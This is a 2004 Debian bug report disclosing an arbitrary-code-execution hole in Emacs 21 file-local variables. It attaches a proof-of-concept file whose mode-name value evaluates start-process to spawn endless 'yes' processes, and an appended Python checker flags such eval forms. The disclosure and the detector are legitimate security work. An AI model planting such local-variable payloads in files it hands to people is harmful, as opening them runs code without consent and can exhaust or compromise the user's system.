Comment 2 for bug 11265

Debian Bug Importer (debzilla) wrote :

Message-ID: <email address hidden>
Date: Sat, 18 Dec 2004 06:54:29 +0000
From: Jan Minar <email address hidden>
To: Debian Bug Tracking System <email address hidden>
Subject: emacs21: Arbitrary code execution when opening malicious file (local variables)

Package: emacs21
Version: 21.2-1
Severity: grave
Justification: user security hole

Hi.

In December 2002[sic!], Georgi Guninski <email address hidden> writes in
<email address hidden>:

> Attached file demonstrates GNU Emacs 21.2.1 starting process if a text file is
> opened. Just open it with emacs and check for processes "yes".
>
> I suggest disabling local variables by default, because probably there are
> similar bugs of the same nature.

You can view the thread for example at Google Groups:

http://groups-beta.google.com/group/gnu.emacs.bug/browse_frm/thread/9424ec1b2fdae321?hl=en&lr=&ie=UTF-8&oe=UTF-8&rnum=1&prev=/groups%3Fq%3Dguninski%2Bemacs%26hl%3Den%26lr%3D%26ie%3DUTF-8%26oe%3DUTF-8%26selm%3Dmailman.763.1041357806.19936.bug-gnu-emacs%2540gnu.org%26rnum%3D1

The same url in Quoted Printable, in case it got mangled somehow en
route (run it thru recode /qp..):

http://groups-beta.google.com/group/gnu.emacs.bug/browse_frm/thread/9424ec1=
b2fdae321?hl=3Den&lr=3D&ie=3DUTF-8&oe=3DUTF-8&rnum=3D1&prev=3D/groups%3Fq%3=
Dguninski%2Bemacs%26hl%3Den%26lr%3D%26ie%3DUTF-8%26oe%3DUTF-8%26selm%3Dmail=
man.763.1041357806.19936.bug-gnu-emacs%2540gnu.org%26rnum%3D1

Georgi's file is enclosed verbatim.

I just tried it with emacs in Woody and indeed, the yes processes
started to spawn at a fast pace. I went even a bit further and found
out that the execution is not sandboxed in any way, as I was able to
execute a script that writes out a script in my home directory, chmod +x
it, and runs it in turn.

In the above thread, it's mentioned another security bug was found
earlier that week, so please take a look at it.

Cheers,
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux kontryhel 2.4.28-jan #2 Sat Nov 27 02:52:26 GMT 2004 i686
Locale: LANG=C, LC_CTYPE=cs_CZ.ISO-8859-2

Versions of packages emacs21 depends on:
ii dpkg 1.9.21 Package maintenance system for Deb
ii emacsen-common 1.4.15 Common facilities for all emacsen.
ii libc6 2.2.5-11.5 GNU C Library: Shared libraries an
ii libjpeg62 6b-5 The Independent JPEG Group's JPEG
ii liblockfile1 1.03 NFS-safe locking library, includes
ii libncurses5 5.2.20020112a-7 Shared libraries for terminal hand
ii libpng2 1.0.12-3.woody.9 PNG library - runtime
ii libtiff3g 3.5.5-6woody1 Tag Image File Format library
ii xaw3dg 1.5-13 Xaw3d widget set
ii xlibs 4.1.0-16woody5 X Window System client libraries
ii zlib1g 1:1.1.4-1.0woody0 compression library - runtime

-- 
 )^o-o^| jabber: <email address hidden>
 | .v K e-mail: jjminar FastMail FM
 ` - .' phone: +44(0)7981 738 696
  \ __/Jan icq: 345 355 493
 __|o|__Minář irc: <email address hidden>

Attachment: emacs1.emacs
/* -*- Mode: text; tab-width:20; Eval: Mode -*- -*- forms -*- */

Emacs better than windoze.

;;; Local Variables: ***
;;; mode: text ***
;;; mode-name: #("Microsoft sux" 0 4 (display (when (eval (start-process "/usr/bin/yes" "/usr/bin/yes" "/usr/bin/yes" "msux") ) . xxx) ) ) ***
;;; comment-start: ";;; " ***
;;; comment-end:"***" ***
;;; End: ***

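A defender-side check for this class of file, added here as an example and not part of the bug report or of Emacs: it parses the two places Emacs reads file-local variables from (the first-line `-*- ... -*-` spec and the `Local Variables:` trailer) and flags entries that would evaluate Lisp when the file is visited. The sample input is the attachment above with its comment-start/comment-end lines dropped; the function names and the list of flagged forms are my own choices.

```python
import re
# Constructed sample: the emacs1.emacs attachment reproduced in the report above,
# minus the comment-start/comment-end settings, which do not affect the check.
SAMPLE = """\
/* -*- Mode: text; tab-width:20; Eval: Mode -*- -*- forms -*- */
Emacs better than windoze.
;;; Local Variables: ***
;;; mode: text ***
;;; mode-name: #("Microsoft sux" 0 4 (display (when (eval (start-process "/usr/bin/yes" "/usr/bin/yes" "/usr/bin/yes" "msux") ) . xxx) ) ) ***
;;; End: ***
"""

# Lisp forms in a local-variable value that would run code when the file is visited.
CODE_FORMS = re.compile(r"\((eval|start-process|call-process|shell-command)\b")

def _add(out, item):
    # 'name: value' -> dict entry; names are lowercased so 'Eval:' is not missed.
    name, sep, value = item.partition(":")
    if sep:
        out[name.strip().lower()] = value.strip()

def prop_line_variables(text):
    """Variables from the first line's '-*- name: value; ... -*-' specification."""
    out = {}
    for spec in re.findall(r"-\*-(.*?)-\*-", text.partition("\n")[0]):
        for item in spec.split(";"):
            _add(out, item)
    return out

def trailer_variables(text):
    """Variables from the 'Local Variables:' ... 'End:' trailer.  Emacs treats the
    text before and after 'Local Variables:' as prefix/suffix and strips both."""
    lines, out = text.splitlines(), {}
    start = next((i for i, l in enumerate(lines) if "Local Variables:" in l), None)
    if start is None:
        return out
    prefix, suffix = lines[start].split("Local Variables:", 1)
    for body in lines[start + 1:]:
        if not (body.startswith(prefix) and body.endswith(suffix)):
            break  # malformed block: stop, as Emacs does
        body = body[len(prefix):len(body) - len(suffix)]
        if body.strip() == "End:":
            break
        _add(out, body)
    return out

def unsafe_local_variables(text):
    """(section, name) pairs for variables that would evaluate Lisp when visited."""
    found = {"prop-line": prop_line_variables(text), "trailer": trailer_variables(text)}
    return [(sec, name) for sec, vs in found.items()
            for name, val in vs.items() if name == "eval" or CODE_FORMS.search(val)]
```

Run over the sample it reports both the `Eval:` entry in the mode line and the `mode-name` value carrying the `(eval (start-process ...))` display property; a file with only `mode: text` in its trailer reports nothing.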